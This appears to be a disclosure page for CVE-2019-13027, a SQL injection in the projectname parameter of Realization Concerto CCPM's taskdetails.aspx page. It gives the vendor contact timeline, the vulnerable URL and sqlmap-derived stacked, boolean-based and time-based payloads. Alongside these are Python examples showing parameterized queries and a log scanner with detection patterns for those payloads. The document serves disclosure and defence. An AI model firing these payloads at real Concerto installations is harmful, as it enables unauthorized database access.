
CVE-2019-13027 PoC — Realization Concerto Critical Chain Planner SQL injection vulnerability

Title: Realization Concerto Critical Chain Planner SQL injection vulnerability (CVE-2019-13027)
Description: Realization Concerto Critical Chain Planner (CCPM) is a project management suite. The taskupdt/taskdetails.aspx page in Realization CCPM 5.10.8071 contains a SQL injection vulnerability. It stems from the database-backed application failing to validate externally supplied input before using it in SQL statements. An attacker can exploit the flaw to execute unauthorized SQL commands.
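The description above names the root cause: untrusted input spliced into SQL text. The following Python is an added illustration, not code from the advisory, the PoC repository or Realization. It builds a constructed in-memory SQLite table (the real product runs on Microsoft SQL Server; the `projects` table, its columns and the helper names are assumptions) and contrasts a concatenated query with a parameterized one, using the boolean-based true/false pair from the advisory's sqlmap output to show why only the concatenated version leaks a yes/no oracle.

```python
import sqlite3


# Constructed sample table; the real product uses Microsoft SQL Server, and
# this table layout is an assumption for illustration only.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE projects (name TEXT PRIMARY KEY, owner TEXT)")
    conn.executemany(
        "INSERT INTO projects VALUES (?, ?)",
        [("foo", "alice"), ("bar", "bob"), ("secret", "carol")],
    )
    return conn


def lookup_concat(conn, projectname):
    """Vulnerable pattern: the parameter is spliced into the SQL text."""
    sql = "SELECT name, owner FROM projects WHERE name = '" + projectname + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn, projectname):
    """Hardened pattern: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT name, owner FROM projects WHERE name = ?"
    return conn.execute(sql, (projectname,)).fetchall()


# The boolean-based pair behind the advisory's sqlmap finding: same prefix,
# one true tail and one false tail. A blind injection is possible whenever
# the application's response differs between the two.
TRUE_PAYLOAD = "foo' AND 3676=3676-- "
FALSE_PAYLOAD = "foo' AND 3676=3677-- "


def has_boolean_oracle(conn, lookup):
    """True if the lookup answers differently to the true/false pair."""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = build_db()
    print("concat oracle:", has_boolean_oracle(db, lookup_concat))  # True
    print("param  oracle:", has_boolean_oracle(db, lookup_param))   # False
```

With concatenation the `-- ` tail comments out the closing quote and the injected condition becomes part of the WHERE clause, so the true tail returns the `foo` row and the false tail returns nothing. With a bound parameter the whole string is compared as a literal project name, no such project exists, and both tails return the same empty result, which is exactly the absence of signal that blind techniques depend on.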
# CVE-2019-13027
Details for disclosing CVE-2019-13027

Vendor contact timeline:
1st July 2019 -> No response, no email back.

4th July 2019 -> No response, no email back.

8th July 2019 -> Email sent, Github created.

11th July 2019 -> No Vendor response. Vuln disclosed.

> [Vulnerability Type]
> SQL Injection
> [Affected Product Code Base]
> CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Version: 5.10.8071 (Other versions on the 5.x branch are probably affected. Cannot test with other branches)
> ------------------------------------------
> 
> [Affected Component]
> Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has some critical security issues, namely
> SQL Injection in at least the taskupdt/taskdetails.aspx webpage via the "projectname" parameter
> 
> ------------------------------------------
> 
> [Attack Type]
> Remote
> 
> 
> [Attack Vectors]
> Application has a lot of reflected XSS/CSRF (for example, in checklist/checklist), but the tricky part is the SQL Injections. Some tampering is needed depending on SQL Server version and/or IDS/IPS.
>
>
> URL:
> https://concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
>
> ProjectName (foo) must exist and be valid. Fuzz the rest of the parameters (or use a real request).
> foo also has an XSS.
>
> Detected SQL (payloads from SQLMAP)
> Parameter: projectname (GET)
>   
> 
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries (comment)
>     Payload: projectname=foo';WAITFOR DELAY '0:0:5'--
> 
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: projectname=foo' AND 3676=3676-- 
>
>     Type: time-based blind
>     Title: Microsoft SQL Server/Sybase time-based blind (IF)
>     Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 
> 
>
> 
> 
> [Vendor of Product]
> REALIZATION - https://www.realization.com/
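The three payload shapes the sqlmap output above lists (stacked query, boolean-based, time-based) are also what a defender would hunt for in web-server logs for the affected page. The following Python is an added example, not part of the advisory or the PoC repository: it parses a few constructed IIS-style W3C log lines (the field layout `date time cs-method cs-uri-stem cs-uri-query sc-status` is an assumption), decodes each request's query string and flags any parameter value matching one of those shapes.

```python
import re
from urllib.parse import parse_qs

# Signatures for the injection shapes the advisory's sqlmap output lists.
# They are deliberately narrow; a production rule set would be broader and
# tuned against the site's own traffic to keep false positives down.
SIGNATURES = {
    "time-based": re.compile(r"waitfor\s+delay", re.I),                   # WAITFOR DELAY '0:0:5'
    "stacked": re.compile(r"'\s*;"),                                       # quote, then a new statement
    "boolean-based": re.compile(r"'\s+(?:and|or)\s+\d+\s*=\s*\d+", re.I),  # ' AND 3676=3676
    "comment-terminator": re.compile(r"--\s*$"),                           # trailing SQL comment
}

# Constructed IIS W3C-style log lines (assumed field layout:
# date time cs-method cs-uri-stem cs-uri-query sc-status). The query string
# is kept percent-encoded, as IIS writes it.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2019-07-11 10:15:02 GET /taskupdt/taskdetails.aspx projectname=foo&taskID=1 200",
    "2019-07-11 10:15:09 GET /taskupdt/taskdetails.aspx "
    "projectname=foo%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&taskID=1 200",
    "2019-07-11 10:15:21 GET /taskupdt/taskdetails.aspx "
    "projectname=foo%27+AND+3676%3D3676--+&taskID=1 200",
    "2019-07-11 10:15:30 GET /checklist/checklist.aspx id=5 200",
]


def parse_w3c_line(line):
    """Split one log line into fields; None for directive or malformed lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != 6:
        return None
    date, time, method, stem, query, status = parts
    return {"time": f"{date} {time}", "method": method,
            "stem": stem, "query": query, "status": status}


def classify_value(value):
    """Names of every signature that matches a decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_log(lines):
    """Decode each request's query string and flag parameters matching a signature."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        rec = parse_w3c_line(line)
        if rec is None or rec["query"] == "-":   # IIS writes "-" for an empty query
            continue
        for name, values in parse_qs(rec["query"], keep_blank_values=True).items():
            for value in values:
                tags = classify_value(value)
                if tags:
                    findings.append({"line": lineno, "time": rec["time"],
                                     "stem": rec["stem"], "param": name,
                                     "value": value, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['stem']} param={f['param']} tags={f['tags']}")
```

Decoding before matching matters: the `'` and `;` arrive as `%27` and `%3B`, so a rule applied to the raw query string would miss them, and the time-based shape is worth pairing with response-time data (a run of requests to the same page each taking about five seconds longer than baseline) since it produces no error and no content change on its own.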
File snapshot

    [4.0K] /data/pocs/3908ad9007409809f16cec536c8ddf4ee0042b0b
    └── [1.9K] README.md

    0 directories, 1 file